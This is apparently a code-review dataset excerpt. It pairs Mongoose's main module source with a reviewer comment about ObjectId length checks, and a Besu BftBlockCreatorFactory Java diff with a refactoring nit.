mongoose-specific options explained below. * @param {Boolean} [options.bufferCommands=true] Mongoose specific option. Set to false to [disable buffering](http://mongoosejs.com/docs/faq.html#callback_never_executes) on all models associated with this connection. * @param {String} [options.dbName] The name of the database you want to use. If not provided, Mongoose uses the database name from connection string. * @param {String} [options.user] username for authentication, equivalent to `options.auth.user`. Maintained for backwards compatibility. * @param {String} [options.pass] password for authentication, equivalent to `options.auth.password`. Maintained for backwards compatibility. * @param {Boolean} [options.autoIndex=true] Mongoose-specific option. Set to false to disable automatic index creation for all models associated with this connection. * @param {Boolean} [options.useNewUrlParser=false] False by default. Set to `true` to make all connections set the `useNewUrlParser` option by default. * @param {Boolean} [options.useUnifiedTopology=false] False by default. Set to `true` to make all connections set the `useUnifiedTopology` option by default. * @param {Boolean} [options.useCreateIndex=true] Mongoose-specific option. If `true`, this connection will use [`createIndex()` instead of `ensureIndex()`](/docs/deprecations.html#ensureindex) for automatic index builds via [`Model.init()`](/docs/api.html#model_Model.init). * @param {Boolean} [options.useFindAndModify=true] True by default. Set to `false` to make `findOneAndUpdate()` and `findOneAndRemove()` use native `findOneAndUpdate()` rather than `findAndModify()`. * @param {Number} [options.reconnectTries=30] If you're connected to a single server or mongos proxy (as opposed to a replica set), the MongoDB driver will try to reconnect every `reconnectInterval` milliseconds for `reconnectTries` times, and give up afterward. When the driver gives up, the mongoose connection emits a `reconnectFailed` event. This option does nothing for replica set connections. * @param {Number} [options.reconnectInterval=1000] See `reconnectTries` option above. * @param {Class} [options.promiseLibrary] Sets the [underlying driver's promise library](http://mongodb.github.io/node-mongodb-native/3.1/api/MongoClient.html). 
* @param {Number} [options.poolSize=5] The maximum number of sockets the MongoDB driver will keep open for this connection. By default, `poolSize` is 5. Keep in mind that, as of MongoDB 3.4, MongoDB only allows one operation per socket at a time, so you may want to increase this if you find you have a few slow queries that are blocking faster queries from proceeding. See [Slow Trains in MongoDB and Node.js](http://thecodebarbarian.com/slow-trains-in-mongodb-and-nodejs). * @param {Number} [options.bufferMaxEntries] This option does nothing if `useUnifiedTopology` is set. The MongoDB driver also has its own buffering mechanism that kicks in when the driver is disconnected. Set this option to 0 and set `bufferCommands` to `false` on your schemas if you want your database operations to fail immediately when the driver is not connected, as opposed to waiting for reconnection. * @param {Number} [options.connectTimeoutMS=30000] How long the MongoDB driver will wait before killing a socket due to inactivity _during initial connection_. Defaults to 30000. This option is passed transparently to [Node.js' `socket#setTimeout()` function](https://nodejs.org/api/net.html#net_socket_settimeout_timeout_callback). * @param {Number} [options.socketTimeoutMS=30000] How long the MongoDB driver will wait before killing a socket due to inactivity _after initial connection_. A socket may be inactive because of either no activity or a long-running operation. This is set to `30000` by default, you should set this to 2-3x your longest running operation if you expect some of your database operations to run longer than 20 seconds. This option is passed to [Node.js `socket#setTimeout()` function](https://nodejs.org/api/net.html#net_socket_settimeout_timeout_callback) after the MongoDB driver successfully completes. * @param {Number} [options.family=0] Passed transparently to [Node.js' `dns.lookup()`](https://nodejs.org/api/dns.html#dns_dns_lookup_hostname_options_callback) function. May be either `0`, `4`, or `6`. `4` means use IPv4 only, `6` means use IPv6 only, `0` means try both. * @return {Connection} the created Connection object. Connections are thenable, so you can do `await mongoose.createConnection()` * @api public */ Mongoose.prototype.createConnection = function(uri, options, callback) { const _mongoose = this instanceof Mongoose ? this : mongoose; const conn = new Connection(_mongoose); if (typeof options === 'function') { callback = options; options = null; } _mongoose.connections.push(conn); if (arguments.length > 0) { return conn.openUri(uri, options, callback); } return conn; }; /** * Opens the default mongoose connection. * * ####Example: * * mongoose.connect('mongodb://user:pass@localhost:port/database'); * * // replica sets * const uri = 'mongodb://user:pass@localhost:port,anotherhost:port,yetanother:port/mydatabase'; * mongoose.connect(uri); * * // with options * mongoose.connect(uri, options); * * // optional callback that gets fired when initial connection completed * const uri = 'mongodb://nonexistent.domain:27000'; * mongoose.connect(uri, function(error) { * // if error is truthy, the initial connection failed. * }) * * @param {String} uri(s) * @param {Object} [options] passed down to the [MongoDB driver's `connect()` function](http://mongodb.github.io/node-mongodb-native/3.0/api/MongoClient.html), except for 4 mongoose-specific options explained below. * @param {Boolean} [options.bufferCommands=true] Mongoose specific option. 
Set to false to [disable buffering](http://mongoosejs.com/docs/faq.html#callback_never_executes) on all models associated with this connection. * @param {Number} [options.bufferTimeoutMS=true] Mongoose specific option. If `bufferCommands` is true, Mongoose will throw an error after `bufferTimeoutMS` if the operation is still buffered. * @param {String} [options.dbName] The name of the database we want to use. If not provided, use database name from connection string. * @param {String} [options.user] username for authentication, equivalent to `options.auth.user`. Maintained for backwards compatibility. * @param {String} [options.pass] password for authentication, equivalent to `options.auth.password`. Maintained for backwards compatibility. * @param {Number} [options.poolSize=5] The maximum number of sockets the MongoDB driver will keep open for this connection. By default, `poolSize` is 5. Keep in mind that, as of MongoDB 3.4, MongoDB only allows one operation per socket at a time, so you may want to increase this if you find you have a few slow queries that are blocking faster queries from proceeding. See [Slow Trains in MongoDB and Node.js](http://thecodebarbarian.com/slow-trains-in-mongodb-and-nodejs). * @param {Boolean} [options.useUnifiedTopology=false] False by default. Set to `true` to opt in to the MongoDB driver's replica set and sharded cluster monitoring engine. * @param {Number} [options.serverSelectionTimeoutMS] If `useUnifiedTopology = true`, the MongoDB driver will try to find a server to send any given operation to, and keep retrying for `serverSelectionTimeoutMS` milliseconds before erroring out. If not set, the MongoDB driver defaults to using `30000` (30 seconds). * @param {Number} [options.heartbeatFrequencyMS] If `useUnifiedTopology = true`, the MongoDB driver sends a heartbeat every `heartbeatFrequencyMS` to check on the status of the connection. A heartbeat is subject to `serverSelectionTimeoutMS`, so the MongoDB driver will retry failed heartbeats for up to 30 seconds by default. Mongoose only emits a `'disconnected'` event after a heartbeat has failed, so you may want to decrease this setting to reduce the time between when your server goes down and when Mongoose emits `'disconnected'`. We recommend you do **not** set this setting below 1000, too many heartbeats can lead to performance degradation. * @param {Boolean} [options.autoIndex=true] Mongoose-specific option. Set to false to disable automatic index creation for all models associated with this connection. * @param {Boolean} [options.useNewUrlParser=false] False by default. Set to `true` to opt in to the MongoDB driver's new URL parser logic. * @param {Boolean} [options.useCreateIndex=true] Mongoose-specific option. If `true`, this connection will use [`createIndex()` instead of `ensureIndex()`](/docs/deprecations.html#ensureindex) for automatic index builds via [`Model.init()`](/docs/api.html#model_Model.init). * @param {Boolean} [options.useFindAndModify=true] True by default. Set to `false` to make `findOneAndUpdate()` and `findOneAndRemove()` use native `findOneAndUpdate()` rather than `findAndModify()`. * @param {Number} [options.reconnectTries=30] If you're connected to a single server or mongos proxy (as opposed to a replica set), the MongoDB driver will try to reconnect every `reconnectInterval` milliseconds for `reconnectTries` times, and give up afterward. When the driver gives up, the mongoose connection emits a `reconnectFailed` event. This option does nothing for replica set connections. 
* @param {Number} [options.reconnectInterval=1000] See `reconnectTries` option above. * @param {Class} [options.promiseLibrary] Sets the [underlying driver's promise library](http://mongodb.github.io/node-mongodb-native/3.1/api/MongoClient.html). * @param {Number} [options.bufferMaxEntries] This option does nothing if `useUnifiedTopology` is set. The MongoDB driver also has its own buffering mechanism that kicks in when the driver is disconnected. Set this option to 0 and set `bufferCommands` to `false` on your schemas if you want your database operations to fail immediately when the driver is not connected, as opposed to waiting for reconnection. * @param {Number} [options.connectTimeoutMS=30000] How long the MongoDB driver will wait before killing a socket due to inactivity _during initial connection_. Defaults to 30000. This option is passed transparently to [Node.js' `socket#setTimeout()` function](https://nodejs.org/api/net.html#net_socket_settimeout_timeout_callback). * @param {Number} [options.socketTimeoutMS=30000] How long the MongoDB driver will wait before killing a socket due to inactivity _after initial connection_. A socket may be inactive because of either no activity or a long-running operation. This is set to `30000` by default, you should set this to 2-3x your longest running operation if you expect some of your database operations to run longer than 20 seconds. This option is passed to [Node.js `socket#setTimeout()` function](https://nodejs.org/api/net.html#net_socket_settimeout_timeout_callback) after the MongoDB driver successfully completes. * @param {Number} [options.family=0] Passed transparently to [Node.js' `dns.lookup()`](https://nodejs.org/api/dns.html#dns_dns_lookup_hostname_options_callback) function. May be either `0`, `4`, or `6`. `4` means use IPv4 only, `6` means use IPv6 only, `0` means try both. * @param {Boolean} [options.autoCreate=false] Set to `true` to make Mongoose automatically call `createCollection()` on every model created on this connection. * @param {Function} [callback] * @see Mongoose#createConnection #index_Mongoose-createConnection * @api public * @return {Promise} resolves to `this` if connection succeeded */ Mongoose.prototype.connect = function(uri, options, callback) { const _mongoose = this instanceof Mongoose ? this : mongoose; const conn = _mongoose.connection; return _mongoose._promiseOrCallback(callback, cb => { conn.openUri(uri, options, err => { if (err != null) { return cb(err); } return cb(null, _mongoose); }); }); }; /** * Runs `.close()` on all connections in parallel. * * @param {Function} [callback] called after all connection close, or when first error occurred. * @return {Promise} resolves when all connections are closed, or rejects with the first error that occurred. * @api public */ Mongoose.prototype.disconnect = function(callback) { const _mongoose = this instanceof Mongoose ? 
this : mongoose; return _mongoose._promiseOrCallback(callback, cb => { let remaining = _mongoose.connections.length; if (remaining <= 0) { return cb(null); } _mongoose.connections.forEach(conn => { conn.close(function(error) { if (error) { return cb(error); } if (!--remaining) { cb(null); } }); }); }); }; /** * _Requires MongoDB >= 3.6.0._ Starts a [MongoDB session](https://docs.mongodb.com/manual/release-notes/3.6/#client-sessions) * for benefits like causal consistency, [retryable writes](https://docs.mongodb.com/manual/core/retryable-writes/), * and [transactions](http://thecodebarbarian.com/a-node-js-perspective-on-mongodb-4-transactions.html). * * Calling `mongoose.startSession()` is equivalent to calling `mongoose.connection.startSession()`. * Sessions are scoped to a connection, so calling `mongoose.startSession()` * starts a session on the [default mongoose connection](/docs/api.html#mongoose_Mongoose-connection). * * @param {Object} [options] see the [mongodb driver options](http://mongodb.github.io/node-mongodb-native/3.0/api/MongoClient.html#startSession) * @param {Boolean} [options.causalConsistency=true] set to false to disable causal consistency * @param {Function} [callback] * @return {Promise<ClientSession>} promise that resolves to a MongoDB driver `ClientSession` * @api public */ Mongoose.prototype.startSession = function() { const _mongoose = this instanceof Mongoose ? this : mongoose; return _mongoose.connection.startSession.apply(_mongoose.connection, arguments); }; /** * Getter/setter around function for pluralizing collection names. * * @param {Function|null} [fn] overwrites the function used to pluralize collection names * @return {Function|null} the current function used to pluralize collection names, defaults to the legacy function from `mongoose-legacy-pluralize`. * @api public */ Mongoose.prototype.pluralize = function(fn) { const _mongoose = this instanceof Mongoose ? this : mongoose; if (arguments.length > 0) { _mongoose._pluralize = fn; } return _mongoose._pluralize; }; /** * Defines a model or retrieves it. * * Models defined on the `mongoose` instance are available to all connection * created by the same `mongoose` instance. * * If you call `mongoose.model()` with twice the same name but a different schema, * you will get an `OverwriteModelError`. If you call `mongoose.model()` with * the same name and same schema, you'll get the same schema back. * * ####Example: * * const mongoose = require('mongoose'); * * // define an Actor model with this mongoose instance * const schema = new Schema({ name: String }); * mongoose.model('Actor', schema); * * // create a new connection * const conn = mongoose.createConnection(..); * * // create Actor model * const Actor = conn.model('Actor', schema); * conn.model('Actor') === Actor; // true * conn.model('Actor', schema) === Actor; // true, same schema * conn.model('Actor', schema, 'actors') === Actor; // true, same schema and collection name * * // This throws an `OverwriteModelError` because the schema is different. * conn.model('Actor', new Schema({ name: String })); * * _When no `collection` argument is passed, Mongoose uses the model name. 
If you don't like this behavior, either pass a collection name, use `mongoose.pluralize()`, or set your schemas collection name option._ * * ####Example: * * const schema = new Schema({ name: String }, { collection: 'actor' }); * * // or * * schema.set('collection', 'actor'); * * // or * * const collectionName = 'actor' * const M = mongoose.model('Actor', schema, collectionName) * * @param {String|Function} name model name or class extending Model * @param {Schema} [schema] the schema to use. * @param {String} [collection] name (optional, inferred from model name) * @param {Boolean|Object} [skipInit] whether to skip initialization (defaults to false). If an object, treated as options. * @return {Model} The model associated with `name`. Mongoose will create the model if it doesn't already exist. * @api public */ Mongoose.prototype.model = function(name, schema, collection, skipInit) { const _mongoose = this instanceof Mongoose ? this : mongoose; let model; if (typeof name === 'function') { model = name; name = model.name; if (!(model.prototype instanceof Model)) { throw new _mongoose.Error('The provided class ' + name + ' must extend Model'); } } if (typeof schema === 'string') { collection = schema; schema = false; } if (utils.isObject(schema) && !(schema instanceof Schema)) { schema = new Schema(schema); } if (schema && !(schema instanceof Schema)) { throw new Error('The 2nd parameter to `mongoose.model()` should be a ' + 'schema or a POJO'); } if (typeof collection === 'boolean') { skipInit = collection; collection = null; } // handle internal options from connection.model() let options; if (skipInit && utils.isObject(skipInit)) { options = skipInit; skipInit = true; } else { options = {}; } // look up schema for the collection. if (!_mongoose.modelSchemas[name]) { if (schema) { // cache it so we only apply plugins once _mongoose.modelSchemas[name] = schema; } else { throw new mongoose.Error.MissingSchemaError(name); } } const originalSchema = schema; if (schema) { if (_mongoose.get('cloneSchemas')) { schema = schema.clone(); } _mongoose._applyPlugins(schema); } let sub; // connection.model() may be passing a different schema for // an existing model name. in this case don't read from cache. const overwriteModels = _mongoose.options.hasOwnProperty('overwriteModels') ? 
_mongoose.options.overwriteModels : options.overwriteModels; if (_mongoose.models[name] && options.cache !== false && overwriteModels !== true) { if (originalSchema && originalSchema.instanceOfSchema && originalSchema !== _mongoose.models[name].schema) { throw new _mongoose.Error.OverwriteModelError(name); } if (collection && collection !== _mongoose.models[name].collection.name) { // subclass current model with alternate collection model = _mongoose.models[name]; schema = model.prototype.schema; sub = model.__subclass(_mongoose.connection, schema, collection); // do not cache the sub model return sub; } return _mongoose.models[name]; } // ensure a schema exists if (!schema) { schema = this.modelSchemas[name]; if (!schema) { throw new mongoose.Error.MissingSchemaError(name); } } // Apply relevant "global" options to the schema if (!('pluralization' in schema.options)) { schema.options.pluralization = _mongoose.options.pluralization; } if (!collection) { collection = schema.get('collection') || utils.toCollectionName(name, _mongoose.pluralize()); } const connection = options.connection || _mongoose.connection; model = _mongoose.Model.compile(model || name, schema, collection, connection, _mongoose); if (!skipInit) { // Errors handled internally, so safe to ignore error model.init(function $modelInitNoop() {}); } if (options.cache === false) { return model; } _mongoose.models[name] = model; return _mongoose.models[name]; }; /** * Removes the model named `name` from the default connection, if it exists. * You can use this function to clean up any models you created in your tests to * prevent OverwriteModelErrors. * * Equivalent to `mongoose.connection.deleteModel(name)`. * * ####Example: * * mongoose.model('User', new Schema({ name: String })); * console.log(mongoose.model('User')); // Model object * mongoose.deleteModel('User'); * console.log(mongoose.model('User')); // undefined * * // Usually useful in a Mocha `afterEach()` hook * afterEach(function() { * mongoose.deleteModel(/.+/); // Delete every model * }); * * @api public * @param {String|RegExp} name if string, the name of the model to remove. If regexp, removes all models whose name matches the regexp. * @return {Mongoose} this */ Mongoose.prototype.deleteModel = function(name) { const _mongoose = this instanceof Mongoose ? this : mongoose; _mongoose.connection.deleteModel(name); return _mongoose; }; /** * Returns an array of model names created on this instance of Mongoose. * * ####Note: * * _Does not include names of models created using `connection.model()`._ * * @api public * @return {Array} */ Mongoose.prototype.modelNames = function() { const _mongoose = this instanceof Mongoose ? this : mongoose; const names = Object.keys(_mongoose.models); return names; }; /** * Applies global plugins to `schema`. * * @param {Schema} schema * @api private */ Mongoose.prototype._applyPlugins = function(schema, options) { const _mongoose = this instanceof Mongoose ? this : mongoose; options = options || {}; options.applyPluginsToDiscriminators = get(_mongoose, 'options.applyPluginsToDiscriminators', false); options.applyPluginsToChildSchemas = get(_mongoose, 'options.applyPluginsToChildSchemas', true); applyPlugins(schema, _mongoose.plugins, options, '$globalPluginsApplied'); }; /** * Declares a global plugin executed on all Schemas. * * Equivalent to calling `.plugin(fn)` on each Schema you create. 
* * @param {Function} fn plugin callback * @param {Object} [opts] optional options * @return {Mongoose} this * @see plugins ./plugins.html * @api public */ Mongoose.prototype.plugin = function(fn, opts) { const _mongoose = this instanceof Mongoose ? this : mongoose; _mongoose.plugins.push([fn, opts]); return _mongoose; }; /** * The Mongoose module's default connection. Equivalent to `mongoose.connections[0]`, see [`connections`](#mongoose_Mongoose-connections). * * ####Example: * * const mongoose = require('mongoose'); * mongoose.connect(...); * mongoose.connection.on('error', cb); * * This is the connection used by default for every model created using [mongoose.model](#index_Mongoose-model). * * To create a new connection, use [`createConnection()`](#mongoose_Mongoose-createConnection). * * @memberOf Mongoose * @instance * @property {Connection} connection * @api public */ Mongoose.prototype.__defineGetter__('connection', function() { return this.connections[0]; }); Mongoose.prototype.__defineSetter__('connection', function(v) { if (v instanceof Connection) { this.connections[0] = v; this.models = v.models; } }); /** * An array containing all [connections](connections.html) associated with this * Mongoose instance. By default, there is 1 connection. Calling * [`createConnection()`](#mongoose_Mongoose-createConnection) adds a connection * to this array. * * ####Example: * * const mongoose = require('mongoose'); * mongoose.connections.length; // 1, just the default connection * mongoose.connections[0] === mongoose.connection; // true * * mongoose.createConnection('mongodb://localhost:27017/test'); * mongoose.connections.length; // 2 * * @memberOf Mongoose * @instance * @property {Array} connections * @api public */ Mongoose.prototype.connections; /*! * Driver dependent APIs */ const driver = global.MONGOOSE_DRIVER_PATH || './drivers/node-mongodb-native'; /*! * Connection */ const Connection = require(driver + '/connection'); /*! * Collection */ const Collection = require(driver + '/collection'); /** * The Mongoose Aggregate constructor * * @method Aggregate * @api public */ Mongoose.prototype.Aggregate = Aggregate; /** * The Mongoose Collection constructor * * @method Collection * @api public */ Mongoose.prototype.Collection = Collection; /** * The Mongoose [Connection](#connection_Connection) constructor * * @memberOf Mongoose * @instance * @method Connection * @api public */ Mongoose.prototype.Connection = Connection; /** * The Mongoose version * * #### Example * * console.log(mongoose.version); // '5.x.x' * * @property version * @api public */ Mongoose.prototype.version = pkg.version; /** * The Mongoose constructor * * The exports of the mongoose module is an instance of this class. * * ####Example: * * const mongoose = require('mongoose'); * const mongoose2 = new mongoose.Mongoose(); * * @method Mongoose * @api public */ Mongoose.prototype.Mongoose = Mongoose; /** * The Mongoose [Schema](#schema_Schema) constructor * * ####Example: * * const mongoose = require('mongoose'); * const Schema = mongoose.Schema; * const CatSchema = new Schema(..); * * @method Schema * @api public */ Mongoose.prototype.Schema = Schema; /** * The Mongoose [SchemaType](#schematype_SchemaType) constructor * * @method SchemaType * @api public */ Mongoose.prototype.SchemaType = SchemaType; /** * The various Mongoose SchemaTypes. 
* * ####Note: * * _Alias of mongoose.Schema.Types for backwards compatibility._ * * @property SchemaTypes * @see Schema.SchemaTypes #schema_Schema.Types * @api public */ Mongoose.prototype.SchemaTypes = Schema.Types; /** * The Mongoose [VirtualType](#virtualtype_VirtualType) constructor * * @method VirtualType * @api public */ Mongoose.prototype.VirtualType = VirtualType; /** * The various Mongoose Types. * * ####Example: * * const mongoose = require('mongoose'); * const array = mongoose.Types.Array; * * ####Types: * * - [ObjectId](#types-objectid-js) * - [Buffer](#types-buffer-js) * - [SubDocument](#types-embedded-js) * - [Array](#types-array-js) * - [DocumentArray](#types-documentarray-js) * * Using this exposed access to the `ObjectId` type, we can construct ids on demand. * * const ObjectId = mongoose.Types.ObjectId; * const id1 = new ObjectId; * * @property Types * @api public */ Mongoose.prototype.Types = Types; /** * The Mongoose [Query](#query_Query) constructor. * * @method Query * @api public */ Mongoose.prototype.Query = Query; /** * The Mongoose [Promise](#promise_Promise) constructor. * * @memberOf Mongoose * @instance * @property Promise * @api public */ Object.defineProperty(Mongoose.prototype, 'Promise', { get: function() { return PromiseProvider.get(); }, set: function(lib) { PromiseProvider.set(lib); } }); /** * Storage layer for mongoose promises * * @method PromiseProvider * @api public */ Mongoose.prototype.PromiseProvider = PromiseProvider; /** * The Mongoose [Model](#model_Model) constructor. * * @method Model * @api public */ Mongoose.prototype.Model = Model; /** * The Mongoose [Document](/api/document.html) constructor. * * @method Document * @api public */ Mongoose.prototype.Document = Document; /** * The Mongoose DocumentProvider constructor. Mongoose users should not have to * use this directly * * @method DocumentProvider * @api public */ Mongoose.prototype.DocumentProvider = require('./document_provider'); /** * The Mongoose ObjectId [SchemaType](/docs/schematypes.html). Used for * declaring paths in your schema that should be * [MongoDB ObjectIds](https://docs.mongodb.com/manual/reference/method/ObjectId/). * Do not use this to create a new ObjectId instance, use `mongoose.Types.ObjectId` * instead. * * ####Example: * * const childSchema = new Schema({ parentId: mongoose.ObjectId }); * * @property ObjectId * @api public */ Mongoose.prototype.ObjectId = SchemaTypes.ObjectId; /** * Returns true if Mongoose can cast the given value to an ObjectId, or * false otherwise. * * ####Example: * * mongoose.isValidObjectId(new mongoose.Types.ObjectId()); // true * mongoose.isValidObjectId('0123456789ab'); // true * mongoose.isValidObjectId(6); // false * * @method isValidObjectId * @api public */ Mongoose.prototype.isValidObjectId = function(v) { if (v == null) { return true; } const base = this || mongoose; const ObjectId = base.driver.get().ObjectId; if (v instanceof ObjectId) { return true; } if (v._id != null) { if (v._id instanceof ObjectId) { return true; } if (v._id.toString instanceof Function) { v = v._id.toString(); return typeof v === 'string' && (v.length === 12 || v.length === 24); } } if (v.toString instanceof Function) { v = v.toString(); } if (typeof v === 'string' && (v.length === 12 || v.length === 24)) { return true; } return false; }; /** * The Mongoose Decimal128 [SchemaType](/docs/schematypes.html). 
Used for * declaring paths in your schema that should be * [128-bit decimal floating points](http://thecodebarbarian.com/a-nodejs-perspective-on-mongodb-34-decimal.html). * Do not use this to create a new Decimal128 instance, use `mongoose.Types.Decimal128` * instead. * * ####Example: * * const vehicleSchema = new Schema({ fuelLevel: mongoose.Decimal128 }); * * @property Decimal128 * @api public */ Mongoose.prototype.Decimal128 = SchemaTypes.Decimal128; /** * The Mongoose Mixed [SchemaType](/docs/schematypes.html). Used for * declaring paths in your schema that Mongoose's change tracking, casting, * and validation should ignore. * * ####Example: * * const schema = new Schema({ arbitrary: mongoose.Mixed }); * * @property Mixed * @api public */ Mongoose.prototype.Mixed = SchemaTypes.Mixed; /** * The Mongoose Date [SchemaType](/docs/schematypes.html). * * ####Example: * * const schema = new Schema({ test: Date }); * schema.path('test') instanceof mongoose.Date; // true * * @property Date * @api public */ Mongoose.prototype.Date = SchemaTypes.Date; /** * The Mongoose Number [SchemaType](/docs/schematypes.html). Used for * declaring paths in your schema that Mongoose should cast to numbers. * * ####Example: * * const schema = new Schema({ num: mongoose.Number }); * // Equivalent to: * const schema = new Schema({ num: 'number' }); * * @property Number * @api public */ Mongoose.prototype.Number = SchemaTypes.Number; /** * The [MongooseError](#error_MongooseError) constructor. * * @method Error * @api public */ Mongoose.prototype.Error = require('./error/index'); /** * Mongoose uses this function to get the current time when setting * [timestamps](/docs/guide.html#timestamps). You may stub out this function * using a tool like [Sinon](https://www.npmjs.com/package/sinon) for testing. * * @method now * @returns Date the current time * @api public */ Mongoose.prototype.now = function now() { return new Date(); }; /** * The Mongoose CastError constructor * * @method CastError * @param {String} type The name of the type * @param {Any} value The value that failed to cast * @param {String} path The path `a.b.c` in the doc where this cast error occurred * @param {Error} [reason] The original error that was thrown * @api public */ Mongoose.prototype.CastError = require('./error/cast'); /** * The constructor used for schematype options * * @method SchemaTypeOptions * @api public */ Mongoose.prototype.SchemaTypeOptions = require('./options/SchemaTypeOptions'); /** * The [node-mongodb-native](https://github.com/mongodb/node-mongodb-native) driver Mongoose uses. * * @property mongo * @api public */ Mongoose.prototype.mongo = require('mongodb'); /** * The [mquery](https://github.com/aheckmann/mquery) query builder Mongoose uses. * * @property mquery * @api public */ Mongoose.prototype.mquery = require('mquery'); /*! * ignore */ Mongoose.prototype._promiseOrCallback = function(callback, fn, ee) { return promiseOrCallback(callback, fn, ee, this.Promise); }; /*! * The exports object is an instance of Mongoose. * * @api public */ const mongoose = module.exports = exports = new Mongoose({ [defaultMongooseSymbol]: true });
1
14,551
You also need to add a similar check on line 992; there's another place where we check `length === 24`.
Automattic-mongoose
js
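The review above points at a second spot in the reviewed file (around its line 992) that only accepts `length === 24`. As a hedged illustration only — the helper name and call site below are hypothetical, not mongoose's actual code — this is the kind of dual-length check the reviewer is asking to mirror, matching the `isValidObjectId` logic visible in the file:

// Hypothetical helper, for illustration only: an ObjectId can be represented
// either as 12 raw bytes or as a 24-character hex string, so a bare
// `length === 24` check misses the 12-character form.
function looksLikeObjectIdString(v) {
  return typeof v === 'string' && (v.length === 12 || v.length === 24);
}

console.log(looksLikeObjectIdString('0123456789ab'));             // true  (12 chars)
console.log(looksLikeObjectIdString('62261a65d66c6be0a63c051f')); // true  (24-char hex)
console.log(looksLikeObjectIdString('not-an-object-id'));         // false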
@@ -105,9 +105,14 @@ public class BftBlockCreatorFactory { public Bytes createExtraData(final int round, final BlockHeader parentHeader) { final BftContext bftContext = protocolContext.getConsensusState(BftContext.class); final ValidatorProvider validatorProvider = bftContext.getValidatorProvider(); - checkState(validatorProvider.getVoteProvider().isPresent(), "Bft requires a vote provider"); + checkState( + validatorProvider.getVoteProviderAfterBlock(parentHeader).isPresent(), + "Bft requires a vote provider"); final Optional<ValidatorVote> proposal = - validatorProvider.getVoteProvider().get().getVoteAfterBlock(parentHeader, localAddress); + validatorProvider + .getVoteProviderAfterBlock(parentHeader) + .get() + .getVoteAfterBlock(parentHeader, localAddress); final List<Address> validators = new ArrayList<>(validatorProvider.getValidatorsAfterBlock(parentHeader));
1
/* * Copyright ConsenSys AG. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the * specific language governing permissions and limitations under the License. * * SPDX-License-Identifier: Apache-2.0 */ package org.hyperledger.besu.consensus.common.bft.blockcreation; import static com.google.common.base.Preconditions.checkState; import org.hyperledger.besu.consensus.common.ConsensusHelpers; import org.hyperledger.besu.consensus.common.bft.BftContext; import org.hyperledger.besu.consensus.common.bft.BftExtraData; import org.hyperledger.besu.consensus.common.bft.BftExtraDataCodec; import org.hyperledger.besu.consensus.common.bft.Vote; import org.hyperledger.besu.consensus.common.validator.ValidatorProvider; import org.hyperledger.besu.consensus.common.validator.ValidatorVote; import org.hyperledger.besu.datatypes.Address; import org.hyperledger.besu.datatypes.Wei; import org.hyperledger.besu.ethereum.ProtocolContext; import org.hyperledger.besu.ethereum.blockcreation.BlockCreator; import org.hyperledger.besu.ethereum.core.BlockHeader; import org.hyperledger.besu.ethereum.core.MiningParameters; import org.hyperledger.besu.ethereum.eth.transactions.sorter.AbstractPendingTransactionsSorter; import org.hyperledger.besu.ethereum.mainnet.AbstractGasLimitSpecification; import org.hyperledger.besu.ethereum.mainnet.ProtocolSchedule; import java.util.ArrayList; import java.util.Collections; import java.util.List; import java.util.Optional; import java.util.concurrent.atomic.AtomicLong; import org.apache.tuweni.bytes.Bytes; public class BftBlockCreatorFactory { private final AbstractPendingTransactionsSorter pendingTransactions; protected final ProtocolContext protocolContext; protected final ProtocolSchedule protocolSchedule; protected final BftExtraDataCodec bftExtraDataCodec; private final Address localAddress; final Address miningBeneficiary; protected volatile Bytes vanityData; private volatile Wei minTransactionGasPrice; private volatile Double minBlockOccupancyRatio; private volatile Optional<AtomicLong> targetGasLimit; public BftBlockCreatorFactory( final AbstractPendingTransactionsSorter pendingTransactions, final ProtocolContext protocolContext, final ProtocolSchedule protocolSchedule, final MiningParameters miningParams, final Address localAddress, final Address miningBeneficiary, final BftExtraDataCodec bftExtraDataCodec) { this.pendingTransactions = pendingTransactions; this.protocolContext = protocolContext; this.protocolSchedule = protocolSchedule; this.localAddress = localAddress; this.minTransactionGasPrice = miningParams.getMinTransactionGasPrice(); this.minBlockOccupancyRatio = miningParams.getMinBlockOccupancyRatio(); this.vanityData = miningParams.getExtraData(); this.miningBeneficiary = miningBeneficiary; this.bftExtraDataCodec = bftExtraDataCodec; this.targetGasLimit = miningParams.getTargetGasLimit(); } public BlockCreator create(final BlockHeader parentHeader, final int round) { return new BftBlockCreator( localAddress, () -> targetGasLimit.map(AtomicLong::longValue), ph -> createExtraData(round, ph), pendingTransactions, protocolContext, protocolSchedule, minTransactionGasPrice, 
minBlockOccupancyRatio, parentHeader, miningBeneficiary, bftExtraDataCodec); } public void setExtraData(final Bytes extraData) { this.vanityData = extraData.copy(); } public void setMinTransactionGasPrice(final Wei minTransactionGasPrice) { this.minTransactionGasPrice = minTransactionGasPrice; } public Wei getMinTransactionGasPrice() { return minTransactionGasPrice; } public Bytes createExtraData(final int round, final BlockHeader parentHeader) { final BftContext bftContext = protocolContext.getConsensusState(BftContext.class); final ValidatorProvider validatorProvider = bftContext.getValidatorProvider(); checkState(validatorProvider.getVoteProvider().isPresent(), "Bft requires a vote provider"); final Optional<ValidatorVote> proposal = validatorProvider.getVoteProvider().get().getVoteAfterBlock(parentHeader, localAddress); final List<Address> validators = new ArrayList<>(validatorProvider.getValidatorsAfterBlock(parentHeader)); final BftExtraData extraData = new BftExtraData( ConsensusHelpers.zeroLeftPad(vanityData, BftExtraDataCodec.EXTRA_VANITY_LENGTH), Collections.emptyList(), toVote(proposal), round, validators); return bftExtraDataCodec.encode(extraData); } public void changeTargetGasLimit(final Long newTargetGasLimit) { if (AbstractGasLimitSpecification.isValidTargetGasLimit(newTargetGasLimit)) { this.targetGasLimit.ifPresentOrElse( existing -> existing.set(newTargetGasLimit), () -> this.targetGasLimit = Optional.of(new AtomicLong(newTargetGasLimit))); } else { throw new UnsupportedOperationException("Specified target gas limit is invalid"); } } public Address getLocalAddress() { return localAddress; } private static Optional<Vote> toVote(final Optional<ValidatorVote> input) { return input .map(v -> Optional.of(new Vote(v.getRecipient(), v.getVotePolarity()))) .orElse(Optional.empty()); } }
1
26,217
nit: can extract the voteProvider as a local variable
hyperledger-besu
java
